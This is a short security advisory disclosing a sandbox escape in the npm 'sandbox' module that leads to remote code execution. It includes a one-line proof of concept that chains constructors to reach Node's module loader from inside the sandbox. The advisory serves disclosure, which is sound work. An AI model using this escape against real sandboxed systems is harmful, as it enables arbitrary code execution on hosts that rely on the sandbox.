Sandbox Breakout / Arbitrary Code Executionsandbox
All versions of
sandbox are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.
Proof of concept
var Sandbox = require("sandbox") s = new Sandbox() code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")` s.run(code)
No fix is currently available. Consider using an alternative module until a fix is made available.
publishedAdvisory PublishedJan 14th, 2019
reportedReported by Lucas FieglJan 14th, 2019